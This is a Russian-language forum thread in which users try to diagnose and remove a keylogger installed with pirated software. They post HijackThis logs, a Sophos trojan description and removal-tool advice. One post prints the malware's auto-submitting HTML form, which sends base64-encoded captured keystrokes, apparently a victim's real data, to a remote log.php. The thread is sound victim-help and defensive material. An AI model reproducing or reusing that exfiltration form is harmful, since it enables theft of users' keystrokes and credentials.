» что за варез?

Просьба ко всем присутствующим:
Подскажите – намучался –чего-то все-таки не понимаю:
После перезагрузки окрывается окно (строка: dbclist - Microsoft…., меняется на: VPbWH5ggfg543232FiH, затем затем Iexplorer идет по адресу: http://phpwarez.us/kla/log.php и открывает окно с сообщением: Не могу соединиться с базой данныхAccess denied for user 'phpwarez'@'localhost' (using password: YES)
ПОМОГИТЕ ИЗБАВИТЬСЯ ОТ ЭТОЙ …
Где и что надо удалить?

Путь стандартный - свежие базы, запущенные процессы и т. д.
Поподробней расскажи плз. кто выдает, после чего это случилось?

Устанавливал программы варезные с диска (купил через интернет наложенным платежом), после чего Iexplorer стал автоматически загружать страницу (см. выше).
Пробовал в свойствах обозревателя поставить - с пустой (blank), очистить кэш - все прекрасно, но все равно сначала загружается C:/Documents%20and%20Settings/iii/Application%20Data/Microsoft/Internet%20Explorer/dbclist.htm и т.д.
Какая-то автозагрузка...что-ли? Откуда может идти команда?

Цитата:

Какая-то автозагрузка...что-ли?

По логу
HiJackThis

все будет видно.

А если поподробнее? Очень актуален этот вопрос!

g0rm0n

Цитата:

А если поподробнее? Очень актуален этот вопрос!

подробнее что? выше ссылка на прогу, которая выведет что и где запускается или подключается

Уважаемый Cheery!
Хоть я и не первый день за компом, но с этой заразой пока справиться не могу. При подключениик инету самостоятельно запускается Опера отображая вокне что-то вроде этого:http://fotoshare.info/image.shtml?image=zex.jpg
При просмотре страницы в исходниках обнаруживаем следующее:<html><head><title>VPbWH5ggfgd5432432FiH</title></head><body onload="javascript:setTimeout('pform.submit()', 1000)"><form method="POST" name="pform" action="http://phpwarez.us/kla/log.php"><textarea name="data">DQpbU3RhcnQgdGltZTogMTYuMS4yMDA3IDE0OjMyOjMzXSBbQ29tcHV0ZXIgTmFtZTogTUFHTklULTIwMDddIFtVc2VyIE5hbWU6IFRpbmdhbV0NCg0KW1dpbmRvdyBUZXh0OiBbMjgwLTY1NC0zMTVdIC0gzurt7iDx7u7h+eXt6OldDQpbU2hpZnRd0eXw5ePgIO/w6OLl8ltDYXBzIExvY2tdMSBbQmFja3NwYWNlXVtCYWNrc3BhY2VdW0NhcHMgTG9ja11bU2hpZnRdISBbU2hpZnRdW1NoaWZ0XVtTaGlmdF1bU2hpZnRdW1NoaWZ0XVtTaGlmdF3E4OLg6SDt7uzl8ltCYWNrc3BhY2Vd8CDy5evl9O7t4C5bRW50ZXJdPExfQ0xJQ0s+W1NoaWZ0XdP17ubzLiDv7ufm5SD4W0JhY2tzcGFjZV3j6// и так далее.
Антивирус=0, спайваре=0
Ad-Aware SE Professional,nod32, оутпост

g0rm0n

Цитата:

Хоть я и не первый день за компом, но с этой заразой пока справиться не могу

ну сколько раз тебе нужно повторить???? запусти ту прогу, скопируй в файл ответ и выложи куда нить. дай сюда ссылку (если будешь выкладывать на форуме, то только между тагами [no][more]и[/more][/no])
при чем тут код страницы??

g0rm0n
навроде вот такого отчет:
[more]Logfile of HijackThis v1.99.1
Scan saved at 0:56:31, on 18.01.07
Platform: Windows 98 SE (Win9x 4.10.2222A)
MSIE: Internet Explorer v5.00 (5.00.2614.3500)

Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\SYSTEM\KB891711\KB891711.EXE
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\TASKMON.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\WINDOWS\SYSTEM\INTERNAT.EXE
C:\WINDOWS\SYSTEM\WMIEXE.EXE
//тут был процесс стенки, виснетик.//
C:\PROGRAM FILES\TOTALCMD\TOTALCMD.EXE
C:\WINDOWS\SYSTEM\DDHELP.EXE
C:\PROGRAM FILES\NETTOOLS\PORTABLEFIREFOX\FIREFOX\FIREFOX.EXE
C:\PROGRAM FILES\NETTOOLS\FLASHGET\FLASHGET.EXE
C:\WINDOWS\TEMP\_TC\HIJACKTHIS.EXE

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.ru
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.ru
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.yandex.ru
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.forum.ru-board.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = 127.0.0.1

(хосты я сам ставил, они тут никому не интересны, потому удалил)

O2 - BHO: IeCatch2 Class - {A5366673-E8CA-11D3-9CD9-0090271D075B} - C:\PROGRAM FILES\NETTOOLS\FLASHGET\JCCATCH.DLL
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\PROGRAM FILES\ADOBE\ACROBAT 5.0\READER\ACTIVEX\ACROIEHELPER.OCX
O2 - BHO: FlashFXP Helper for Internet Explorer - {E5A1691B-D188-4419-AD02-90002030B8EE} - C:\PROGRA~1\NETTOOLS\FLASHFXP\IEFLASH.DLL
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\SYSTEM\MSDXM.OCX
O3 - Toolbar: FlashGet Bar - {E0E899AB-F487-11D5-8D29-0050BA6940E3} - C:\PROGRAM FILES\NETTOOLS\FLASHGET\FGIEBAR.DLL
O4 - HKLM\..\Run: [ScanRegistry] C:\WINDOWS\scanregw.exe /autorun
O4 - HKLM\..\Run: [TaskMonitor] C:\WINDOWS\taskmon.exe
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [internat.exe] internat.exe
O4 - HKLM\..\RunServices: [KB891711] C:\WINDOWS\SYSTEM\KB891711\KB891711.EXE
O8 - Extra context menu item: Закачать при помощи FlashGet - C:\PROGRAM FILES\NETTOOLS\FLASHGET\jc_link.htm
O8 - Extra context menu item: Закачать все при помощи FlashGet - C:\PROGRAM FILES\NETTOOLS\FLASHGET\jc_all.htm
O8 - Extra context menu item: + Offline &Explorer: Download the link - file://C:\PROGRAM FILES\NETTOOLS\OFFLINE EXPLORER ENTERPRISE\Add_UrlO.htm
O8 - Extra context menu item: + Offline E&xplorer: Download the current page - file://C:\PROGRAM FILES\NETTOOLS\OFFLINE EXPLORER ENTERPRISE\Add_AllO.htm
O9 - Extra button: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\PROGRAM FILES\NETTOOLS\FLASHGET\FLASHGET.EXE
O9 - Extra 'Tools' menuitem: &FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\PROGRAM FILES\NETTOOLS\FLASHGET\FLASHGET.EXE
O12 - Plugin for .spop: C:\PROGRA~1\INTERN~1\Plugins\NPDocBox.dll
[/more]
попутно вопрос к часто рассматривающим логи хайджака - что-нить подозрительное видно? Ибо с недавних пор что-то настойчиво стучится в сеть. В процесах не вижу, антивири также пока молчат. "Toolbar: &Radio" и "O12 - Plugin for .spop" вроде незнакомы, но не уверен.

bredonosec
из того, что там есть, все ок.
куда ломится ?

Цитата:

куда ломится ?

- если б знал - сам бы уже копал связи
при отключенном кабеле сети, отрубленном браузере, но включенной стенке в её логе вижу стук на гейт. Куда пойдет, если дать - неясно. (попробую при повторном запуске определить, пока чистоту эксперимента отнимает фф, также гуляющий самостоятельно - правда за рсс новостями)
что точно знаю - что пару дней назад этого не было.

Цитата:

что точно знаю - что пару дней назад этого не было

откати назад из образа

Вот лог Хайджека
[more]Logfile of HijackThis v1.99.1
Scan saved at 7:21:07, on 16.01.2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\kxmixer.exe
C:\Program Files\Logitech\iTouch\iTouch.exe
C:\Program Files\Eset\nod32kui.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\OO Software\CleverCache\ooccctrl.exe
C:\Program Files\Punto Switcher\ps.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Common Files\Ahead\lib\NMBgMonitor.exe
C:\Program Files\Logitech\SetPoint\SetPoint.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
C:\Program Files\APC\APC PowerChute Personal Edition\mainserv.exe
C:\Program Files\APC\APC PowerChute Personal Edition\apcsystray.exe
C:\Program Files\Common Files\Logitech\khalshared\KHALMNPR.EXE
C:\Program Files\Eset\nod32krn.exe
C:\Program Files\OO Software\CleverCache\ooccag.exe
C:\Program Files\Agnitum\Outpost Firewall\outpost.exe
C:\WINDOWS\system32\pctspk.exe
C:\Program Files\CyberLink\Shared files\RichVideo.exe
C:\WINDOWS\system32\SMSL.exe
C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindService.exe
C:\WINDOWS\System32\svchost.exe
C:\Documents and Settings\Tingam\Рабочий стол\ольга\HijackThis.exe
D:\ZAKORMA\Professional Notepad 2.9 Rus.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\WinRAR\WinRAR.exe
C:\Program Files\Opera 9\Opera.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Ссылки
O4 - HKLM\..\Run: [kX Mixer] C:\WINDOWS\system32\kxmixer.exe --startup
O4 - HKLM\..\Run: [Logitech Hardware Abstraction Layer] "C:\Program Files\Common Files\Logitech\khalshared\KHALMNPR.EXE"
O4 - HKLM\..\Run: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE
O4 - HKLM\..\Run: [zBrowser Launcher] C:\Program Files\Logitech\iTouch\iTouch.exe
O4 - HKLM\..\Run: [PtiuPbmd] Rundll32.exe ptipbm.dll,SetWriteBack
O4 - HKLM\..\Run: [OSSelectorReinstall] C:\Program Files\Common Files\Acronis\Acronis Disk Director\oss_reinstall.exe
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKLM\..\Run: [KillCopy] C:\Program Files\KillSoft\KillCopy\kcresume.exe /startup
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [Outpost Firewall] "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe" /waitservice
O4 - HKLM\..\Run: [OutpostFeedBack] C:\Program Files\Agnitum\Outpost Firewall\feedback.exe /dump:os_startup
O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe
O4 - HKLM\..\Run: [ooccctrl.exe] C:\Program Files\OO Software\CleverCache\ooccctrl.exe /tasktray
O4 - HKCU\..\Run: [Punto Switcher] C:\Program Files\Punto Switcher\ps.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\lib\NMBgMonitor.exe"
O4 - Global Startup: Logitech SetPoint.lnk = ?
O4 - Global Startup: APC UPS Status.lnk = ?
O8 - Extra context menu item: &Экспорт в Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: Быстрая настройка Outpost Firewall Pro - {44627E97-789B-40d4-B5C2-58BD171129A1} - C:\Program Files\Agnitum\Outpost Firewall\Plugins\BrowserBar\ie_bar.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\Office12\REFIEBAR.DLL
O10 - Broken Internet access because of LSP provider 'c:\program files\bonjour\mdnsnsp.dll' missing
O17 - HKLM\System\CCS\Services\Tcpip\..\{99F5A916-FF2B-446B-A9FF-0B4382D7E501}: NameServer = 217.116.148.10
O18 - Protocol: ms-help - {314111C7-A502-11D2-BBCA-00C04F8EC294} - C:\Program Files\Common Files\Microsoft Shared\Help\hxds.dll
O18 - Filter hijack: text/xml - {807563E5-5146-11D5-A672-00B0D022E945} - C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE12\MSOXMLMF.DLL
O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\
O21 - SSODL: ODBCListMgr - {AB326AB0-7FD1-4E4D-BF0F-0B06FE385BCA} - odbcmr32.dll (file missing)
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: APC UPS Service - American Power Conversion Corporation - C:\Program Files\APC\APC PowerChute Personal Edition\mainserv.exe
O23 - Service: ASP.NET State Service (aspnet_state) - Unknown owner - C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe (file missing)
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: ##Id_String1.6844F930_1628_4223_B5CC_5BB94B879762## (Bonjour Service) - Unknown owner - C:\Program Files\Bonjour\mDNSResponder.exe (file missing)
O23 - Service: Журнал событий (Eventlog) - Корпорация Майкрософт - C:\WINDOWS\system32\services.exe
O23 - Service: FLEXnet Licensing Service - Macrovision Europe Ltd. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: Служба COM записи компакт-дисков IMAPI (ImapiService) - Корпорация Майкрософт - C:\WINDOWS\System32\imapi.exe
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: NetMeeting Remote Desktop Sharing (mnmsrvc) - Корпорация Майкрософт - C:\WINDOWS\System32\mnmsrvc.exe
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe
O23 - Service: O&O CleverCache Agent (OOCleverCacheAgent) - O&O Software GmbH - C:\Program Files\OO Software\CleverCache\ooccag.exe
O23 - Service: Outpost Firewall Service (OutpostFirewall) - Agnitum Ltd. - C:\Program Files\Agnitum\Outpost Firewall\outpost.exe
O23 - Service: PCTEL Speaker Phone (Pctspk) - PCtel, Inc. - C:\WINDOWS\system32\pctspk.exe
O23 - Service: Plug and Play (PlugPlay) - Корпорация Майкрософт - C:\WINDOWS\system32\services.exe
O23 - Service: Диспетчер сеанса справки для удаленного рабочего стола (RDSessMgr) - Корпорация Майкрософт - C:\WINDOWS\system32\sessmgr.exe
O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Program Files\CyberLink\Shared files\RichVideo.exe
O23 - Service: Смарт-карты (SCardSvr) - Корпорация Майкрософт - C:\WINDOWS\System32\SCardSvr.exe
O23 - Service: RAS (SMSL) - Unknown owner - C:\WINDOWS\system32\SMSL.exe" /Service (file missing)
O23 - Service: StarWind iSCSI Service (StarWindService) - Rocket Division Software - C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindService.exe
O23 - Service: Журналы и оповещения производительности (SysmonLog) - Корпорация Майкрософт - C:\WINDOWS\system32\smlogsvc.exe
O23 - Service: Теневое копирование тома (VSS) - Корпорация Майкрософт - C:\WINDOWS\System32\vssvc.exe
O23 - Service: Адаптер производительности WMI (WmiApSrv) - Корпорация Майкрософт - C:\WINDOWS\System32\wbem\wmiapsrv.exe
[/more]


Добавлено:
Нашел на другом форуме:
С неделю назад проверил свою ось на предмет хуков и инжектов. Многие тулзы (вроде AVZ) говорили, что всё чисто. Решил самостоятельно подумать над этой проблемой и написал программу, которая проверяет всё и вся на снятие хуков (с инжектами у меня не вышло). Нашёл hdtext.dll, который-то и снимает хуки. Оказалось, что он ещё инжектирует свой код, куда только можно.
Вот его функции:
kernel32.CloseHandle
kernel32.CreateFileMappingA
kernel32.GetCurrentProcess
kernel32.GetCurrentProcessId
kernel32.GetModuleFileNameA
kernel32.GetModuleHandleA
kernel32.GetProcAddress
kernel32.MapViewOfFile
kernel32.OpenFileMappingA
kernel32.UnmapViewOfFile
kernel32.VirtualProtectEx
kernel32.WriteProcessMemory
kernel32.lstrcmpiA
USER32.SetWindowsHookExA - хаха
kernel32.CloseHandle
kernel32.CreateFileA
kernel32.GetFileType
kernel32.GetFileSize
kernel32.GetStdHandle
kernel32.RaiseException
kernel32.ReadFile
ntdll.RtlUnwind
kernel32.SetEndOfFile
kernel32.SetFilePointer
kernel32.UnhandledExceptionFilter
kernel32.WriteFile
USER32.CharNextA
kernel32.ExitProcess
USER32.MessageBoxA
kernel32.FindClose
kernel32.FindFirstFileA
kernel32.FreeLibrary
kernel32.GetCommandLineA
ntdll.RtlGetLastWin32Error
kernel32.GetLocaleInfoA
kernel32.GetModuleFileNameA
kernel32.GetModuleHandleA
kernel32.GetProcAddress
kernel32.GetStartupInfoA
kernel32.GetThreadLocale
kernel32.LoadLibraryExA
kernel32.lstrcpyA
kernel32.lstrcpynA
kernel32.lstrlenA
ADVAPI32.RegCloseKey
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegQueryValueExA
kernel32.VirtualQuery
oleaut32.VariantClear
kernel32.GetStartupInfoA>
kernel32.LocalAlloc
kernel32.LocalFree
kernel32.VirtualAlloc
kernel32.VirtualFree
kernel32.InitializeCriticalSection
ntdll.RtlEnterCriticalSection
ntdll.RtlLeaveCriticalSection
ntdll.RtlDeleteCriticalSection

По идее программа простая, но вот только кав ругается при загрузке, что её нет. Пришлось вернуть на место. Вроде программа неопасная (маскимум кейлог), а всё же проникла в кав и диктует ему условия.
Проверь себя, нет ли у тебя этой дряни.

зы-мой случай! Вопрос: Убив этот файл избавлюсь ли я от этой заразы окончательно?

Найти и попробовать обезвредить попробуй вот этим RkUnhooker или этим GMER. Так же увидишь все автозапуски. Еще попробуй RegRun и UnHackMe. По последним есть темы здесь, здесь и здесь

чудеса в решете блин..
супердат от макафи промолчал, свежеслитый cureit аналогично, поставил спайбота с сегодняшними (точнее, уже вчерашними) базами - опять только несколько куков накопал (ие не пользую), да имена закладок чем-то не понравились ему..
Ребутнулся, засел в засаде у журнала - а фиг. Нету ничего. Не стучится.
где собака порылась - неясно, но напрягает...

Цитата:

откати назад из образа

- да откатить-то откачу, но хочу понять, чем это меня, ведь как один раз урвал, так и второй раз получу то же самое.

Цитата:

Проверь себя, нет ли у тебя этой дряни

"файл не найден"
latin

Цитата:

UnHackMe.

поглядим... она вроде как не требует инсталла?

Первоначально требуется. После этого в "Опциях" на кнопке "Море" и "Копи команд файл то флопи". Потом загружаешься с дискеты.

g0rm0n
поздравляю..

Цитата:

C:\WINDOWS\system32\SMSL.exe

http://www.sophos.com/security/analyses/trojbankerbzf.html

Цитата:

This section contains the description and advanced technical information

Troj/Banker-BZF is an internet banking Trojan for the windows platform.

When run, Troj/Banker-BZF copies itself to <System>\smsl.exe

The Trojan sets the following registry entry:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
dark
<System>\smsl.exe

Cheery Поздравлять нечего. Нету такого файлика, нету!


Добавлено:
А вот и текст сообщения оставленного автором этого бл*дского "творения":
Привет! Спасибо за то, что приютили моего конька в своем компьютере. Не пугайтесь, в данном
случае у конька рекламная миссия. Он настроен только на то, что по прошествии n дней,
после того, как вы в первый раз запустили "супер_прогу.ехе", каждые 30 минут выдавать вам
на экран этот текст. Как только это рекламно-навязчивое домогательство вам надоест, просто
удалите (а лучше переименуйте, вдруг пригодится) файл C:\config.txt. Через 30 минут конек не
найдет его, чтобы в очередной раз показать вам, и с горя сдохнет.
А вообще-то у конька большие способности. Если интересно, пишите ****@yandex.ru расскажу
подробнее.

Добавлено:
Касперыч, к удивлению, накопадл много дряни! Вроде всё-победа!

Откатить из образа проще, чет ставить каспера.

latin

Цитата:

Первоначально требуется.

взял, распаковал, сразу предлагает по одному процессы проверять, (step 1 - scan for viruses, step 2 - scan for rootkits, step 3 - scan at next reboot) да окошко регран реаниматора висит.. Это он еще неполно работает?


Цитата:

"Копи команд файл то флопи". Потом загружаешься с дискеты.

с флопом у меня глухо - сгорел контроллер на маме (вероятнее всего, судя по результатам танцев с бубном вокруг железа) пару лет уже как, так что, флопа нет и не предвидится.

bredonosec

Цитата:

взял, распаковал, сразу предлагает по одному процессы проверять, (step 1 - scan for viruses, step 2 - scan for rootkits, step 3 - scan at next reboot) да окошко регран реаниматора висит.. Это он еще неполно работает?

Извините, не совсем понял. Распаковали или установили? Если предлагает, то согласитесь и проведите сканирование.

Цитата:

флопом у меня глухо - сгорел контроллер на маме (вероятнее всего, судя по результатам танцев с бубном вокруг железа) пару лет уже как, так что, флопа нет и не предвидится.

Кажеться можно и на флешку сбросить. Утверждать не буду, но помоему он сначала поругается, что нет А: и выдаст окошко с указанием пути. Вот тогда и можно указать путь к флеш. Попробуйте. Сам проверить не могу т.к. флопик работает. Да, самое главное, в вашем случае тогда необходимо чтобы поддерживалась загрузка с флеш-карты.

Цитата:

Кажеться можно и на флешку сбросить. Утверждать не буду, но помоему он сначала поругается, что нет А: и выдаст окошко с указанием пути.

Нет нелзя. Сегодня проверил. Выдает просто ошибку "Unknown error №21. Device is not ready" Типо устройство не готово. Так что увы.

Цитата:

с флопом у меня глухо - сгорел контроллер на маме

а может эмулятор попробовать?

http://forum.ru-board.com/topic.cgi?forum=5&topic=1631#1


http://www.towodo.com/products/floppyimage/


Цитата:

If you need to create virtual disk drives or work with non-floppy disks, such as USB Flash Drives, Hard Drives, MP3 Players, Digital Cameras, etc, please check out our product

Цитата:

Распаковали или установили? Если предлагает, то согласитесь и проведите сканирование.

именно распаковал. Не совсем сканирование - просто по одному процессы предлагает - чего, дескать с ними делать, игнорить, блокировать, или чего еще. Ну, потыкал, что вроде знакомое по имени в игнор - а смысла не понял: я точно также их мог поглядеть обычным стартером или процессвьюером.
на руткиты проверку отказывается - мол только для НТ, а не 9х.

Цитата:

Да, самое главное, в вашем случае тогда необходимо чтобы поддерживалась загрузка с флеш-карты.

матушка выпуска 2000г, тогда еще не было таких извращений
MetroidZ
погляжу чуть позже - ща работы много привалило..